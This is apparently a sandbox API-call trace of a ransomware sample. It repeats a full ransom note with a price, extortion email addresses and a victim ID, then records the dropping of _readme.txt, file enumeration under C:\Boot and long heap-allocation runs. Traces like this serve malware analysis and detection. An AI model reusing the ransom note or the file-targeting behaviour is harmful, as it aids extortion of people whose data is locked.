returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.625] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.625] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.625] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.625] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.626] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.626] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0201.626] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.626] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.626] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.626] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.626] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.634] 